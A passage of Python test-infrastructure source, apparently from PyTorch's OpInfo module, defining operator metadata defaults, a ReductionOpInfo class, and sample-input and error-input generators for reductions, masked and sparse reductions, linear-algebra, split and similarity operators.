self.dtypesIfCUDA, self.dtypesIfROCM) # Validates the dtypes are generated from the dispatch-related functions for dtype_list in dtypes_args: assert isinstance(dtype_list, (_dispatch_dtypes, type(None))) if self.aten_name is None: self.aten_name = self.name # Attribute to verify dynamic_dtypes are used. self.dynamic_dtypes = any(map(lambda dtypes: isinstance( dtypes, opinfo_helper._dynamic_dispatch_dtypes), dtypes_args)) if self.dynamic_dtypes: # Make sure `dtyesIfCUDA` is dynamic, if dynamic dispatch is used for CPU # This is because, below we set dtypesIfCUDA to dtypes if they are None. assert isinstance(self.dtypesIfCUDA, opinfo_helper._dynamic_dispatch_dtypes), \ (f"To use dynamic dypes for operator {self.name}, " "acquire the dtypes dynamically for argument `dtypesIfCUDA`." "This is to ensure that CUDA dtypes are acquired correctly as they" "differ from CPU dtypes occasionally") self.dtypes = set(self.dtypes) # NOTE: backward dtypes must be acquired before forward dtypes # since they fallback to explicit (not implicit!) 
specifications of # forward dtypes self.backward_dtypesIfROCM = set(self.backward_dtypesIfROCM) if self.backward_dtypesIfROCM is not None else ( self.backward_dtypesIfCUDA if self.backward_dtypesIfCUDA is not None else self.backward_dtypes if self.backward_dtypes is not None else self.dtypesIfROCM if self.dtypesIfROCM is not None else self.dtypesIfCUDA if self.dtypesIfCUDA is not None else self.dtypes) self.backward_dtypesIfCUDA = set(self.backward_dtypesIfCUDA) if self.backward_dtypesIfCUDA is not None else ( self.backward_dtypes if self.backward_dtypes is not None else self.dtypesIfCUDA if self.dtypesIfCUDA is not None else self.dtypes) self.backward_dtypes = set(self.backward_dtypes) if self.backward_dtypes is not None else self.dtypes self.dtypesIfCUDA = set(self.dtypesIfCUDA) if self.dtypesIfCUDA is not None else self.dtypes self.dtypesIfROCM = set(self.dtypesIfROCM) if self.dtypesIfROCM is not None else self.dtypesIfCUDA # NOTE: if the op is unspecified it is assumed to be under the torch namespace if not self.op: self.op = _getattr_qual(torch, self.name) if self.method_variant is _NOTHING: self.method_variant = getattr(torch.Tensor, self.name, None) # attributes like real, imag are not callable if not callable(self.method_variant): self.method_variant = None if self.inplace_variant is _NOTHING: inplace_name = self.name + "_" self.inplace_variant = getattr(torch.Tensor, inplace_name, None) if self.operator_variant is _NOTHING: self.operator_variant = getattr(operator, self.name, None) if self.inplace_operator_variant is _NOTHING: # Note: operator.i<op> will use operator.<op> and assign the result to the lhs when no # __i<op>__ method is found. This results in the appearance of an inplace operator variant which # does not have the correct inplace behavior. To avoid this, we guard automatic detection of the inplace # operator with a check that an inplace variant exists. 
if self.inplace_variant is not None: inplace_operator_name = "i" + self.name self.inplace_operator_variant = getattr(operator, inplace_operator_name, None) else: self.inplace_operator_variant = None self.decorators = (*self.decorators, *self.skips) # We run the sampling functions without tracking the gradiends of the creation of inputs self.sample_inputs_func = torch.no_grad()(self.sample_inputs_func) self.sample_inputs_sparse_coo_func = torch.no_grad()(self.sample_inputs_sparse_coo_func) self.sample_inputs_sparse_csr_func = torch.no_grad()(self.sample_inputs_sparse_csr_func) if self.reference_inputs_func is not None: self.reference_inputs_func = torch.no_grad()(self.reference_inputs_func) if not self.autodiff_fusible_nodes: self.autodiff_fusible_nodes = [] if self.autodiff_nonfusible_nodes is None: self.autodiff_nonfusible_nodes = ['aten::' + self.name] # Autograd support # Autograd flags that depend on backward AD only # - If setting has been explicitly set, raise error if inconsistent if self.supports_gradgrad is None: self.supports_gradgrad = self.supports_autograd else: assert not (self.supports_gradgrad and not self.supports_autograd), ( "supports_gradgrad refines the part of autograd is supported, so it should " "not be set if supports_autograd is False") if self.check_batched_grad is None: self.check_batched_grad = self.supports_autograd or self.supports_forward_ad else: assert not (self.check_batched_grad and not (self.supports_autograd or self.supports_forward_ad)), ( "check_batched_grad refines the part of autograd that will be checked (by gradcheck), so " "it should not be set if supports_autograd is False") if self.check_batched_gradgrad is None: self.check_batched_gradgrad = self.supports_gradgrad else: assert not (self.check_batched_gradgrad and not self.supports_gradgrad), ( "check_batched_gradgrad refines the part of autograd that will be checked (by " "gradgradcheck), so it should not be set if either supports_gradgrad or supports_autograd " "is False.") if self.check_batched_forward_grad is None: self.check_batched_forward_grad = self.supports_forward_ad else: assert not (self.check_batched_forward_grad and not self.supports_forward_ad), ( "check_batched_forward_grad should only be used when supports_forward_ad " "is True. It is used to disable the test in the specific cases " "where the op supports forward ad but fails to compute " "batched forward grad.") if self.check_inplace_batched_forward_grad is None: self.check_inplace_batched_forward_grad = self.check_batched_forward_grad else: assert not (self.check_inplace_batched_forward_grad and not self.check_batched_forward_grad), ( "check_batched_forward_grad should only be used when check_batched_forward_grad " "is True. 
It is used to disable the test in the specific cases " "where the op supports batched forward grad but fails to compute batched forward " "grad for the inplace variant of the op.") assert not (self.supports_fwgrad_bwgrad and not self.supports_autograd), ( "supports_fwgrad_bwgrad enables forward-over-backward gradgrad checks and should only be " "True if backward ad is also checked, i.e., supports_forward_ad should be True.", self.name) # Autograd flags that depend on both forward AD and backward AD if self.supports_inplace_autograd is None: self.supports_inplace_autograd = self.supports_autograd or self.supports_forward_ad else: assert not (self.supports_inplace_autograd and not self.supports_autograd and not self.supports_forward_ad), ( "supports_inplace_autograd refines the part of autograd that is supported, so " "it should not be set if both supports_autograd and supports_forward_ad are False") if self.aliases is not None: self.aliases = tuple(AliasInfo(a) for a in self.aliases) # type: ignore[assignment] else: self.aliases = () def __call__(self, *args, **kwargs): """Calls the function variant of the operator.""" return self.op(*args, **kwargs) def __str__(self): return dataclass_repr(self) def get_op(self): """Returns the function variant of the operator, torch.<op_name>.""" return self.op def get_method(self): """Returns the method variant of the operator, torch.Tensor.<op_name>. Returns None if the operator has no method variant. """ return self.method_variant def get_inplace(self): """Returns the inplace variant of the operator, torch.Tensor.<op_name>_. Returns None if the operator has no inplace variant. """ return self.inplace_variant def get_operator(self): """Returns operator variant of the operator, e.g. operator.neg Returns None if the operator has no operator variant. """ return self.operator_variant def get_inplace_operator(self): """Returns the inplace operator variant of the operator, e.g operator.iadd Returns None if the operator has no inplace operator variant""" return self.inplace_operator_variant def conjugate_sample_inputs(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs but with the tensor input or first tensor in a sequence input conjugated. """ samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) conj_samples = list(samples) def conjugate(tensor): _requires_grad = tensor.requires_grad tensor = tensor.conj() return tensor.requires_grad_(_requires_grad) for i, sample in enumerate(samples): sample = conj_samples[i] # Note: it is assumed that the input here is either a tensor or tensorlist if isinstance(sample.input, torch.Tensor): sample.input = conjugate(sample.input) else: sample.input[0] = conjugate(sample.input[0]) return tuple(conj_samples) def sample_inputs(self, device, dtype, requires_grad=False, **kwargs): """ Returns an iterable of SampleInputs. These samples should be sufficient to test the function works correctly with autograd, TorchScript, etc. """ samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) if kwargs.get('include_conjugated_inputs', False): conj_samples = self.conjugate_sample_inputs(device, dtype, requires_grad, **kwargs) samples_list = list(samples) samples_list.extend(conj_samples) samples = tuple(samples_list) return samples def reference_inputs(self, device, dtype, requires_grad=False, **kwargs): """ Returns an iterable of SampleInputs. 
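# A sketch of how a test typically consumes the class above (the test body is
# hypothetical; see test/test_ops.py for real consumers). The @ops decorator
# from the device-type test framework instantiates the test once per OpInfo,
# device type, and supported dtype:
#
#   @ops(op_db)
#   def test_foo(self, device, dtype, op):
#       for sample in op.sample_inputs(device, dtype, requires_grad=False):
#           result = op(sample.input, *sample.args, **sample.kwargs)
#           ...  # compare result against a reference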
def _generate_reduction_inputs(device, dtype, requires_grad, **kwargs):
    """Generates input tensors for testing reduction operators"""
    yield make_tensor([], dtype=dtype, device=device, requires_grad=requires_grad)
    yield make_tensor([2], dtype=dtype, device=device, requires_grad=requires_grad)
    yield make_tensor([3, 5], dtype=dtype, device=device, requires_grad=requires_grad)
    yield make_tensor([3, 2, 1, 2], dtype=dtype, device=device, requires_grad=requires_grad)


def _generate_reduction_kwargs(ndim, supports_multiple_dims=True):
    """Generates a subset of all valid dim and keepdim kwargs given ndim that
    is appropriate for testing reduction operators.
    """
    # Test default dim and keepdim
    yield {}

    # Test reducing inner and outer most dimensions
    yield {'dim': 0, 'keepdim': True}
    yield {'dim': -1, 'keepdim': False}

    # Test reducing middle dimension
    if ndim > 2:
        yield {'dim': ndim // 2, 'keepdim': True}

    if supports_multiple_dims:
        # Test reducing all dimensions
        yield {'dim': tuple(range(ndim)), 'keepdim': False}

        # Test reducing both first and last dimensions
        if ndim > 1:
            yield {'dim': (0, -1), 'keepdim': True}

        # Test reducing every other dimension starting with the second
        if ndim > 3:
            yield {'dim': tuple(range(1, ndim, 2)), 'keepdim': False}


def sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs):
    """Sample inputs for reduction operators."""
    # TODO(@heitorschueroff) Once all reduction operators are using
    # ReductionOpInfo use op_info.supports_multiple_dims directly.
    supports_multiple_dims: bool = kwargs.get('supports_multiple_dims', True)

    # TODO(@heitorschueroff) Once all reduction operators are using ReductionOpInfo
    # use op_info.generate_args_kwargs directly.
    generate_args_kwargs = kwargs.get('generate_args_kwargs', lambda *args, **kwargs: (yield tuple(), {}))

    for t in _generate_reduction_inputs(device, dtype, requires_grad):
        for reduction_kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims):
            for args, kwargs in generate_args_kwargs(t, **reduction_kwargs):
                kwargs.update(reduction_kwargs)
                yield SampleInput(t.detach().requires_grad_(requires_grad), args=args, kwargs=kwargs)


def _generate_masked_op_mask(input_shape, device, **kwargs):
    yield None
    yield make_tensor(input_shape, dtype=torch.bool, device=device, requires_grad=False)
    if len(input_shape) > 2:
        # broadcast last mask dimension:
        yield make_tensor(input_shape[:-1] + (1,), dtype=torch.bool, device=device, requires_grad=False)
        # broadcast middle mask dimension:
        yield make_tensor(input_shape[:1] + (1,) + input_shape[2:], dtype=torch.bool, device=device, requires_grad=False)
        # broadcast first mask dimension:
        yield make_tensor((1,) + input_shape[1:], dtype=torch.bool, device=device, requires_grad=False)
        # mask.ndim < input.ndim
        yield make_tensor(input_shape[1:], dtype=torch.bool, device=device, requires_grad=False)
        # mask.ndim == 1
        yield make_tensor(input_shape[-1:], dtype=torch.bool, device=device, requires_grad=False)
    # masks that require broadcasting of inputs (mask.ndim >
    # input.ndim) will not be supported, however, we may
    # reconsider this if there is demand for this kind of
    # degenerate case.
""" kwargs['supports_multiple_dims'] = op_info.supports_multiple_dims for sample_input in sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) if(not requires_grad and dtype.is_floating_point and sample_input.input.ndim == 2 and mask is not None and mask.shape == sample_input.input.shape): for v in [torch.inf, -torch.inf, torch.nan]: t = sample_input.input.detach() t.diagonal(0, -2, -1).fill_(v) yield SampleInput(t.requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_sparse_coo_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse coo layouts. """ if op_info.supports_sparse: op_name = op_info.name.replace('_masked.', '') for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse()) yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_name in {'prod', 'amax', 'amin'}: # FIXME: for now reductions with non-zero reduction identity and # unspecified mask are not supported for sparse COO # tensors, see torch._masked.prod implementation # for details. continue yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input.kwargs) def sample_inputs_sparse_csr_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse csr layouts. """ if op_info.supports_sparse_csr: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if not (sample_input.input.ndim == 2 and sample_input.kwargs.get('keepdim')): # - sparse CSR tensors are always 2-D tensors # - masked reduction on CSR tensors are defined only if keepdim is True. continue mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse_csr()) new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_info.name.lstrip('_masked.') in ['prod']: # reductions with non-zero reduction identity and # unspecified mask is not supported for sparse CSR # tensors, see torch._masked.prod implementation # for details. continue new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input.kwargs) yield new_sample if sample_input.kwargs['dim'] == 0: # Reductions of CSR tensors use different implementations for # inner and/or outer dimensions. So, as a minimum of testing CSR # implementations the following kwargs must be generated: # dict(dim=0, keepdim=True) # dict(dim=1, keepdim=True) # dict(dim=(0, 1), keepdim=True) # Here we generate the dim=1 case from the dim=0 case. 
sample_input_kwargs = new_sample.kwargs.copy() sample_input_kwargs.update(dim=1) yield SampleInput(new_sample.input.clone(), args=sample_input.args, kwargs=sample_input_kwargs) def sample_inputs_masked_norm(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked norm. """ for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() yield SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_masked_std_var(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked std/var. """ for unbiased in [False, True]: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if sample_input.args: dim = sample_input.args[0] sample_input_args = sample_input.args[:1] + (unbiased,) + sample_input.args[1:] sample_input_kwargs = sample_input.kwargs.copy() else: dim = sample_input.kwargs.get('dim') sample_input_args = sample_input.args sample_input_kwargs = dict(sample_input.kwargs, unbiased=unbiased) if requires_grad: if sample_input_kwargs.get('mask') is None: orig_count = torch._masked.sum(torch.ones(sample_input.input.shape, dtype=torch.int64), dim, keepdim=True) else: inmask = torch._masked._input_mask(sample_input.input, *sample_input_args, **sample_input_kwargs) orig_count = torch._masked.sum(inmask.new_ones(sample_input.input.shape, dtype=torch.int64), dim, keepdim=True, mask=inmask) if orig_count.min() <= int(unbiased) + 1: # Skip samples that lead to singularities in var # computation resulting nan values both in var and # autograd output that test_grad_fn cannot handle # correctly. Also, skip samples when the autograd output # for std could not be handled correctly due to torch.sqrt continue yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) # NOTE [Reductions]: # # For testing purposes, we relax the definition of a reduction operator # as defined in the docstring below. We do this to capture operators with # a similar API so they can be tested automatically. However... # # Strictly speaking a reduction operator is an operator that can reduce an # array to a single scalar value and that can be computed from the partial # result of reducing subarrays. This usually means that the reduction operation # should be commutative and associative. This definition is important when it # comes to implementation as it determines how a reduction can be parallelized. # # For example, many summary statistics such as median, mode and quantile cannot # be computed from partial results because these are sorting and counting based # algorithms that need information that would be lost in the reduced value. class ReductionOpInfo(OpInfo): """Reduction operator information. An operator is a reduction operator if it reduces one or more dimensions of the input tensor to a single value. Reduction operators must implement the following signature: - `op(input, *args, *, dim=None, keepdim=False, **kwargs) -> Tensor` ReductionOpInfo tests that reduction operators implement a consistent API. Optional features such as reducing over multiple dimensions are captured in the optional keyword parameters of the ReductionOpInfo constructor. 
If a reduction operator does not yet implement the full required API of reduction operators, this should be documented by skipping the failing tests rather than adding optional parameters to ReductionOpInfo. NOTE The API for reduction operators has not yet been finalized and some requirements may change. See tests in test/test_reductions.py """ def __init__( self, name, *, # The identity value for the operator if it has one. identity: Optional[Any] = None, # The nan policy for the operator if it implements one. # - propagate: NaN values are propagated to the output # - omit: NaN values are discarded during the reduction nan_policy: Optional[str] = None, # Whether the operator supports reducing multiple dimensions. supports_multiple_dims: bool = True, # Whether the operator promotes integral to floating point dtypes. promotes_int_to_float: bool = False, # Whether the operator promotes all integral dtypes to int64. promotes_int_to_int64: bool = False, # If a specific dtype is given, then the operator always returns that # dtype irrespective of the input dtype. If None, the operator returns # the dtype according to the type promotion rules above. result_dtype: Optional[torch.dtype] = None, # Casts complex results to real (e.g. linalg.norm or torch.var) complex_to_real: bool = False, # ReductionOpInfo tests generate their own input, dim and keepdim # arguments and call this function to generate tuples of extra args and # kwargs to use when calling the op. This is required for operators that # have other required parameters besides the input tensor. generate_args_kwargs: Callable = lambda t, dim=None, keepdim=False: (yield tuple(), {}), # Options from the OpInfo base class **kwargs, ): self._original_reduction_args = locals().copy() assert nan_policy in (None, 'propagate', 'omit') # These are mutually exclusive options assert not (result_dtype and promotes_int_to_float) assert not (result_dtype and promotes_int_to_int64) assert not (result_dtype and complex_to_real) assert not (promotes_int_to_float and promotes_int_to_int64) # Default sample_inputs_func for ReductionOpInfo which augments sample # inputs from sample_inputs_reduction with the args and kwargs from # generate_args_kwargs. This is only used if sample_inputs_func is None. def sample_inputs_func(*args, **kwargs): kwargs['supports_multiple_dims'] = supports_multiple_dims kwargs['generate_args_kwargs'] = generate_args_kwargs yield from sample_inputs_reduction(*args, **kwargs) # Override OpInfo defaults and call base class __init__ kwargs.setdefault('inplace_variant', None) kwargs.setdefault('sample_inputs_func', sample_inputs_func) super().__init__(name, **kwargs) self.identity = identity self.nan_policy = nan_policy self.supports_multiple_dims = supports_multiple_dims self.promotes_int_to_float = promotes_int_to_float self.promotes_int_to_int64 = promotes_int_to_int64 self.complex_to_real = complex_to_real self.result_dtype = result_dtype self.generate_args_kwargs = generate_args_kwargs def sample_inputs_tensor_split(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) args_cases = ( # Cases with tensor indices. (torch.tensor([1, 2, 3]),), (torch.tensor(1),), (torch.tensor([1, 2, 3]), 1), (torch.tensor([1, 4, 2, 5, 3, 6])[::2], 1), # Cases with list of indices. ((2, 4),), ((2, 4), 1), ((2, 4), -1), # Cases with integer section. 
(3,), (3, 1), (3, -1), ) for args in args_cases: yield SampleInput(make_input((S, S, S)), args=args) def sample_inputs_linalg_det(op_info, device, dtype, requires_grad, **kwargs): kw = dict(device=device, dtype=dtype) inputs = [ make_tensor((S, S), **kw), make_tensor((1, 1), **kw), # 1x1 random_symmetric_matrix(S, **kw), # symmetric random_symmetric_psd_matrix(S, **kw), # symmetric_psd random_symmetric_pd_matrix(S, **kw), # symmetric_pd random_square_matrix_of_rank(S, S - 2, **kw), # dim2_null random_square_matrix_of_rank(S, 1, **kw), # rank1 random_square_matrix_of_rank(S, 2, **kw), # rank2 make_fullrank_matrices_with_distinct_singular_values(S, S, **kw), # full rank make_tensor((3, 3, S, S), **kw), # batched make_tensor((3, 3, 1, 1), **kw), # batched_1x1 random_symmetric_matrix(S, 3, **kw), # batched_symmetric random_symmetric_psd_matrix(S, 3, **kw), # batched_symmetric_psd random_symmetric_pd_matrix(S, 3, **kw), # batched_symmetric_pd make_fullrank_matrices_with_distinct_singular_values(S, 3, 3, **kw), # batched fullrank make_tensor((0, 0), **kw), make_tensor((0, S, S), **kw), ] for t in inputs: t.requires_grad = requires_grad return [SampleInput(t) for t in inputs] def sample_inputs_linalg_det_singular(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype) def make_singular_matrix_batch_base(size, rank): assert size[-1] == size[-2] assert rank > 0 and rank < size[-1] n = size[-1] a = make_arg(size[:-2] + (n, rank)) / 10 b = make_arg(size[:-2] + (rank, n)) / 10 x = a @ b lu, pivs, _ = torch.linalg.lu_factor_ex(x) p, l, u = torch.lu_unpack(lu, pivs) u_diag_abs = u.diagonal(0, -2, -1).abs() u_diag_abs_largest = u_diag_abs.max(dim=-1, keepdim=True).values u_diag_abs_smallest_idxs = torch.topk(u_diag_abs, k=(n - rank), largest=False).indices u.diagonal(0, -2, -1).div_(u_diag_abs_largest) u.diagonal(0, -2, -1)[..., u_diag_abs_smallest_idxs] = torch.finfo(dtype).eps matrix = p @ l @ u matrix.requires_grad_(requires_grad) return matrix def sample_generator(): for batch, size in product(((), (2,), (2, 2)), range(6)): shape = batch + (size, size) for rank in range(1, size): yield make_singular_matrix_batch_base(shape, rank) return [SampleInput(t) for t in sample_generator()] def sample_inputs_linalg_matrix_power(op_info, device, dtype, requires_grad, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_arg_fullrank = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) # (<matrix_size>, (<batch_sizes, ...>)) test_sizes = [ (1, ()), (2, (0,)), (2, (2,)), ] for matrix_size, batch_sizes in test_sizes: size = batch_sizes + (matrix_size, matrix_size) for n in (0, 3, 5): yield SampleInput(make_arg(size), args=(n,)) for n in [-4, -2, -1]: yield SampleInput(make_arg_fullrank(*size), args=(n,)) def sample_inputs_hsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_vsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, 
high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_dsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),), SampleInput(make_tensor((S, S, 6), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),),) def error_inputs_hsplit(op_info, device, **kwargs): err_msg1 = ("torch.hsplit requires a tensor with at least 1 dimension, " "but got a tensor with 0 dimensions!") si1 = SampleInput(make_tensor((), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.hsplit attempted to split along dimension 1, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_vsplit(op_info, device, **kwargs): err_msg1 = ("torch.vsplit requires a tensor with at least 2 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.vsplit attempted to split along dimension 0, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_dsplit(op_info, device, **kwargs): err_msg1 = ("torch.dsplit requires a tensor with at least 3 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.dsplit attempted to split along dimension 2, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def sample_inputs_linalg_multi_dot(op_info, device, dtype, requires_grad, **kwargs): # Each test case consists of the sizes in the chain of multiplications # e.g. 
[2, 3, 4, 5] generates matrices (2, 3) @ (3, 4) @ (4, 5) test_cases = [ [1, 2, 1], [2, 0, 2], [0, 2, 2], [2, 2, 2, 2], [2, 3, 4, 5], [5, 4, 0, 2], [2, 4, 3, 5, 3, 2] ] result = [] for sizes in test_cases: tensors = [] for size in zip(sizes[:-1], sizes[1:]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) tensors.append(t) result.append(SampleInput(tensors)) return result def sample_inputs_linalg_matrix_norm(op_info, device, dtype, requires_grad, **kwargs): sizes = ((2, 2), (2, 3, 2)) ords = ('fro', 'nuc', inf, -inf, 1, -1, 2, -2) dims = ((-2, -1), (-1, 0)) inputs: List[SampleInput] = [] for size, ord, dim, keepdim in product(sizes, ords, dims, [True, False]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(SampleInput(t, args=(ord, dim, keepdim))) return inputs def sample_inputs_linalg_norm(op_info, device, dtype, requires_grad, *, variant=None, **kwargs): if variant is not None and variant not in ('subgradient_at_zero',): raise ValueError(f"Unsupported variant, expected variant to be 'subgradient_at_zero' but got: {variant}") test_sizes = [ (S,), (0,), (S, S), (0, 0), (S, 0), (0, S), (S, S, S), (0, S, S), (S, 0, S), (0, 0, 0), ] vector_ords = (None, 0, 0.5, 1, 2, 3.5, inf, -0.5, -1, -2, -3.5, -inf) matrix_ords = (None, 'fro', 'nuc', 1, 2, inf, -1, -2, -inf) inputs = [] for test_size in test_sizes: is_vector_norm = len(test_size) == 1 is_matrix_norm = len(test_size) == 2 for keepdim in [False, True]: if not variant == 'subgradient_at_zero': inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( keepdim=keepdim))) if not (is_vector_norm or is_matrix_norm): continue ords = vector_ords if is_vector_norm else matrix_ords for ord in ords: if variant == 'subgradient_at_zero': inputs.append(SampleInput( torch.zeros( test_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(ord,), kwargs=dict(keepdim=keepdim))) else: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(ord,), kwargs=dict( keepdim=keepdim))) if ord in ['nuc', 'fro']: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( ord=ord, keepdim=keepdim, dim=(0, 1)))) return inputs def sample_inputs_as_strided(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = ( ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ) for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) kwargs = dict(storage_offset=storage_offset) yield SampleInput(input_t, args=(output_shape, stride), kwargs=kwargs) # as_strided on offset, partial views # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2))) # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2)), kwargs={'storage_offset': 0}) def sample_inputs_as_strided_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = [ ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 
0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ] samples = [] for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) input_src = make_arg(output_shape) kwargs = dict(storage_offset=storage_offset) samples.append(SampleInput(input_t, args=(input_src, output_shape, stride), kwargs=kwargs)) return samples def sample_inputs_combinations(op_info, device, dtype, requires_grad, **kwargs): inputs = ( (0,), (0, 1), (0, 1, 2, 3), ) rvals = [1, 2, 4] products = product(inputs, rvals, [False, True]) samples = [] for input_data, r, with_replacement in products: input_t = torch.tensor(input_data, device=device, dtype=dtype, requires_grad=requires_grad) kwargs = dict(r=r, with_replacement=with_replacement) samples.append(SampleInput(input_t, kwargs=kwargs)) return tuple(samples) def sample_inputs_cartesian_prod(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(torch.tensor, device=device, dtype=dtype, requires_grad=requires_grad) # constructs 1-D tensors with varying number of elements a = make_arg((0,)) b = make_arg((0, 1)) c = make_arg((0, 1, 2, 3)) samples = [] # sample with only 1 tensor samples.append(SampleInput( a )) # sample with 2 tensors samples.append(SampleInput( a, args=(b,) )) # sample with 3 tensors samples.append(SampleInput( a, args=(b, c) )) return tuple(samples) def sample_inputs_cosine_similarity(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input_shape, dict of dim and eps cases: Tuple[tuple, dict] = ( # type: ignore[assignment] ((S, S), {'dim': 1}), ((S, 2), {'dim': -1}), ((S,), {'dim': 0, 'eps': 0.5}), ((), {'dim': 0}), ((S, S, M), {'dim': 2}), ((S, S), {}) ) for input_shape, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(make_arg(input_shape),), kwargs=kwargs) # Test for Broadcasting yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -2}) yield SampleInput(make_arg((2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) def sample_inputs_batch_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, 